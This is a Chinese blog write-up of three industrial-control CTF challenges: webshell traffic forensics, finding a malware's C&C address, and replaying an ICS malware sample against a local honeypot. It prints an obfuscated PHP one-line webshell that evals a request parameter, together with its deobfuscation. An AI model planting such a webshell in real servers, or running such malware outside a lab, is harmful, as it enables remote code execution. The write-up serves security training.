纵横网络靶场-隐藏的黑客-恶意软件后门分析-恶意软件样本分析

已于 2023-10-17 22:28:37 修改
阅读量373 收藏
点赞数
文章标签: 网络
于 2023-10-16 14:49:10 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_68113265/article/details/133857116
版权

目录

1、隐藏的黑客

2、恶意软件后门分析 

3、恶意软件样本分析 

1、隐藏的黑客

题目描述:

根据情报得知工控现场发现某SCADA系统被黑客攻破,附件为黑客在目录留下的文件和当时时间段捕获到的一部分流量包,你能根据这些信息分析出蛛丝马迹来么flag形式为 flag{}。

两个附件,一个流量 一个都是一句话木马文件。猜测黑客进行文件上传,所以先过滤http协议。

 找到可以文件webshell.php。追踪流查看原始数据

复制到010,可以发现是压缩包.删除头尾多余的字节

 要密码且为真加密,这时候就要用到upload目录,写脚本提取。

import os
import re

a = []

for i in os.listdir(r'E:\ctf-web\工控题目\隐藏的黑客\upload'):
    with open('E:\\ctf-web\\工控题目\\隐藏的黑客\\upload\\'+i,'r') as f:
        passwd = re.findall('\[(.*?)\]',f.readline())[0]
        a.append(passwd)

with open('E:\\E-Down\\1.txt','a+') as d:
    for i in a:
        d.write(i+'\n')

 选择字典爆破.得到密码为7b8b965ad4bca。解压的webshell.php

<?php

error_reporting(0);

@$c = array("1JFUVVFU1RbJzlhNzJjM","2Q1ZTc0ZjYwNTFiYjNiMzU","5MGZhOTMxOWZlJ10pOw","MGZhOTMxOWZlJ","MGZhOTMxOWZlJ");
@$str="ZXZhbCgkX";
@$o0o00o00o00o0o0 = chr(97).chr(115).chr(115).chr(101).chr(114).chr(116);
@$ooo00o0o0o0o0o0 = chr(98).chr(97).chr(115).chr(101).chr(54).chr(52).chr(95).chr(100).chr(101).chr(99).chr(111).chr(100).chr(101);
@$count = 0;
for($x=0;$x<=9;$x++){
        if (in_array($x, @$c)){
                @$str=@$str.@$c[@$count];
                if ($count == 2)
                {       
                        @$o0o00o00o00o0o0(@$ooo00o0o0o0o0o0(@$str));
                }
                @$count++;
        }
}
?>

稍微修改原本代码得:

<?php

error_reporting(0);

@$c = array("1JFUVVFU1RbJzlhNzJjM","2Q1ZTc0ZjYwNTFiYjNiMzU","5MGZhOTMxOWZlJ10pOw","MGZhOTMxOWZlJ","MGZhOTMxOWZlJ");
@$str="ZXZhbCgkX";
@$o0o00o00o00o0o0 = chr(97).chr(115).chr(115).chr(101).chr(114).chr(116);
@$ooo00o0o0o0o0o0 = chr(98).chr(97).chr(115).chr(101).chr(54).chr(52).chr(95).chr(100).chr(101).chr(99).chr(111).chr(100).chr(101);
@$count = 0;
for($x=0;$x<=9;$x++){
        if (in_array($x, @$c)){
                @$str=@$str.@$c[@$count];
                if ($count == 2)
                {       
                        echo "@$o0o00o00o00o0o0(@$ooo00o0o0o0o0o0(@$str))";
                }
                @$count++;
        }
}
?>

 结果为:

@assert(@base64_decode(@ZXZhbCgkX1JFUVVFU1RbJzlhNzJjM2Q1ZTc0ZjYwNTFiYjNiMzU5MGZhOTMxOWZlJ10pOw))

解码得flag

2、恶意软件后门分析 

题目描述:

工程师的笔记本上发现了恶意软件,经排查是一款著名针对工业领域的病毒,溯源分析远控样本文件,确认远程C&C连接地址。flag形式为 flag{}

题目要求找远控服务器ip地址

无壳32位

从start开始分析,进入sub_402261

再进入sub_402174

 

得到答案

3、恶意软件样本分析 

题目描述:某家工厂曾发生过宕机事件案例,为防止再发生此事找了技术人员分析攻击行为流量数据包后发现许多异常端口连接记录,最终得到了这个罪魁祸首的病毒样本,请分析病毒样本尝试复现事件案例帮助工厂实施应急演练,flag形式为 flag{}。

解压文件,阅读readme文件,可以找到该文件的原地址

病毒文件

主要运行decompiled_code目录下的script_test.py。接着就要考虑启蜜罐,捕获病毒的通信,最后就是tcpdump保存通信过程,进行分析.

蜜罐

 首先将script_test.py复制到library目录下.接着先开启蜜罐

python2 triconex_honeypot.py

接着开启tcpdump监听本地1502端口

sudo tcpdump -nnvv -i lo port 1502 -w 1.pcap

 最后运行病毒

python2 script_test.py 127.0.0.1

 打开1.pcap进行流量分析

追踪udp,显示原始数据,一个一个试,第一个就是答案

He@11
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
纵横网络靶场资源题-过程详解
09-21
涵盖靶场数道题目,解析过程经过了多次认证,并做了多方查阅,过程详细
工控流量分析题+wireshark学习
热门推荐
qq_53755216的博客
06-28 1万+
写在前面 暑假报名了工控比赛 所以要找些工控的题目来刷刷 正好比赛方提供的靶场有很多类似的题目 开始痛苦的学习过程。。。 Wireshark Capture filter <Protocol name> <Direction><Host(s)><Value><Logical operations><Expression> 如何看带 <Logical operations> 1.<Protocol name>&l
[纵横网络靶场社区]工控安全取证
末初的CSDN博客
09-15 1249
使用file命令查看capture.log,发现是pcap文件,修改后缀为.pcap 根据题目描述可以理解为两种意思: 一个IP的第四次扫描 第四个IP的第一次扫描 分析流量包,发现了192.168.0.9、192.168.0.199、192.168.0.1、192.168.0.254共四个,流量包前面大部分都是192.168.0.9在进行SYN扫描192.168.0.99。如果题目意识是第一种意思,那么flag就应该为192.168.0.9的第四次扫描。 第四次扫描的数据包编号是11,提交fla.
纵横网络靶场社区-wp
qq_43871179的博客
09-26 1636
纵横网络靶场社区(工控安全)-wp https://www.wolai.com/jakie_47/j54AWwKazvALfuYEqyyK5C?theme=light 目前完成了以下题目,因为wolai笔记无法直接导入进csdn上,这里把wolai的笔记链接附上。 大家可以根据下面的预览一下是否有需要查看的题目在点进链接查看详细步骤。 病毒文件恢复 MMS协议分析 S7COMM协议分析 大工UDP协议 Modbus协议 ...
纵横网络靶场社区 大工UDP协议
qq_61993117的博客
09-08 452
万能的strings一把梭,找到字符串666c61677b37466f4d3253746b6865507a7d,然后转换进制得到flag,或者加上grep进行查找(这样稍微快一些),指令:strings 文件(加上路径) | grep “flag” 或strings 文件(加上路径) | grep ”666c6167“提到了UDP协议,那么就对协议进行过滤筛选出flag,指令:udp contains “flag”,追踪一下upd流,然后查找flag。在flag的上面可以看到一串hex就是flag了。
[纵横网络靶场社区]简单流量分析
末初的CSDN博客
09-20 1077
每个ICMP包的data字段都带了一段不同的base64 尝试解码了几段,发现啥也不是。之后的思路需要一点点脑洞,但是对于经验比较丰富的misc手来说也不难猜。 经过仔细观察每个ICMP包中的data段中的base64长度都为十进制ASCII码的可显示字符范围。 将这些ICMP请求包中的data字段数据提取出来,返回包的数据和请求包是一样的,提取的时候只提取请求包的即可 使用tshark提取源地址为192.168.3.73的包的data字段: tshark -r fetus_pcap.pcap -Y '.
[纵横网络靶场社区]恶意软件后门分析
末初的CSDN博客
09-21 868
32位的exe文件,修改后缀为.exe,丢进ida里面分析;ida我也是不很懂,直接从start函数块开始分析 返回了sub_402261()函数块的结果,继续看sub_402261()的内容 发现这个函数块还是主要执行sub_402174(),继续查看sub_402174()函数块 发现个ip,提交就对了。。。 flag{5.39.218.152} ...
纵横网络靶场 部分wp
qq_61768489的博客
08-14 1368
生产系统的运维人员在进行日常审计中发现设备存在大量的告警日志,自动化工程师在进行上载分析中也没有发现相关的问题所在,请您帮助进行分析相关设备的存在的问题,flag格式为:flag{hex数据}flag形式为 flag{}。某厂区遭到黑客恶意扫描,此为安全设备截取的一部分流量包,请尝试分析该流量文件,帮助安全人员找到黑客的行为轨迹,并找到隐藏的FLAG,flag形式为 flag{}工业网络中存在的异常,尝试通过分析PACP流量包,分析出流量数据中的异常 点,并拿到FLAG,flag形式为 flag{}。...
[纵横网络靶场社区]奇怪的文件
末初的CSDN博客
09-21 901
part1、part2、part3很明显是zip文件的压缩源文件数据区、压缩源文件目录区、压缩源文件目录结束标志 三个文件都补全50 4B两个字节,然后依次把part2、part3补全到part1文件中;修改part1文件名为part1.zip 使用010 Editor打开,分析文件结构发现压缩源文件数据区的CRC字段为空、压缩源文件目录区的filename字段为空。CRC可以从压缩源文件目录区获得,filename字段可以从压缩源文件数据区获得。互相补全即可得到完整的zip文件。 有加密,真加.
纵横网络靶场社区-隐藏黑客
底层社会中的弱智
03-30 1130
分析流量包 筛选http协议流量包 使用查询webshell等关键字 找到webshell.php进行取证 可以看出文件以PK开头是一个压缩包文件的头部信息 压缩包中存在webshell.php文件 使用010editor新建Hex文件 复制到010editor中 另存为1.zip 需要解压密码 写个脚本获取upload文件中每个webshell的登陆密码 import os,sys import re if __name__ == '__ma...
[纵横网络靶场社区]隐藏黑客
末初的CSDN博客
09-16 1151
upload文件夹是一堆webshell 流量包含有部分HTTP流量,发现了一个webshell.zip;foremost尝试分离并没有直接分离出来,猜测可能混合了一些其他数据导致没有直接分离出zip文件。尝试导出HTTP对象 导出的文件夹中发现一些字节流文件,其中发现了zip的字节流数据 使用010 Editor打开,去掉前面5个干扰字节,重命名为flag.zip 有加密,真加密;尝试爆破无果,猜测upload文件夹下的webshell密码中可能存在压缩包密码。Python简单处理提取出这些密码.
phpstudy+靶场sqli-labs-master下载
最新发布
11-08
phpstudy+靶场sqli-labs-master下载
渗透测试上传漏洞经典靶场学习-upload-labs
07-02
渗透测试上传漏洞经典靶场学习-upload-labs
网络靶场行业概况分析共29页.pdf.zip
11-02
网络靶场行业概况分析共29页.pdf.zip
渗透测试经典靶场学习-DVWA练习.
07-02
渗透测试经典靶场学习-DVWA练习.
纵横网络靶场社区-Modbus协议
天衷网络科技有限公司
06-19 621
modbus协议 黑客通过外网进入一家工厂的控制网络,之后对工控网络中的操作员站系统进行了攻击,最终通过工控协议破坏了正常的业务。我们得到了操作员站在攻击前后的网络流量数据包,我们需要分析流量中的蛛丝马迹,找到FLAG,flag形式为 flag{}拿到流量分析的文件,观察到他现实读取了线圈和保存寄存器和输入寄存器,读取了离散寄存器,题目介绍到他通过协议破坏了正常的业务,那么就是他通过功能码写入或者修改了寄存器数据,目前学习知道的寄存器的功能码有三个,03,06,16。 使用wires...
纵横网络靶场社区 MMS协议分析
qq_61993117的博客
09-08 1216
排一下包的长度,发现有一个包的长度不正常,点进去看一下内容是一张base64解码的图片。然后把base64后面的数据拿去解码,得到flag。
纵横网络靶场刷题记录
qq_39608382的博客
11-04 1265
ctf工控刷题
纵横网络靶场社区 工控
weixin_51387754的博客
10-31 1130
社区旨为工控安全技术爱好者打造线上实训与竞赛社区,社区将远程接入虚实结合靶场环境,为工控安全技术研究人员开放基础资源,提供学习交流资源共享平台。
vulhub靶场cve-2019-14234
09-19
CVE-2019-14234是指vulhub靶场中的一个漏洞。这个漏洞是由于vulhub中的一个名为Fastjson的组件的安全缺陷引起的。Fastjson是一种广泛使用的Java JSON库,用于在Java应用程序中进行JSON转换。然而,Fastjson在处理特殊构造的JSON字符串时存在漏洞,攻击者可以利用这个漏洞执行任意的Java代码。 在CVE-2019-14234中,攻击者可以通过构造特定的JSON字符串并发送给受影响的应用程序来利用该漏洞。当应用程序使用Fastjson解析并处理该字符串时,恶意的Java代码将被执行。攻击者可以利用这个漏洞来执行远程代码,从而导致敏感信息泄露、服务器被入侵等危害。 为了防止CVE-2019-14234的攻击,可以采取多种措施。首先,更新vulhub中的Fastjson组件到最新版本,以获得最新的安全修复。其次,在编码和处理JSON数据时,应谨慎处理不受信任的输入。可以使用输入验证和过滤来确保传入的数据是符合预期的,并且不包含恶意的代码。 此外,安全审计和漏洞扫描工具也可以用于检测和修复CVE-2019-14234漏洞。通过定期扫描应用程序,可以及时发现和修复潜在的安全问题。最后,加强网络安全意识教育,提高开发人员和用户对网络安全的认识和理解,从而进一步提高防范和应对漏洞攻击的能力。 综上所述,CVE-2019-14234是vulhub靶场中的一个Fastjson组件漏洞,可以被攻击者利用来执行任意的Java代码。修复这个漏洞的方法包括更新Fastjson组件、输入验证和过滤、安全审计和漏洞扫描以及加强网络安全意识教育。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值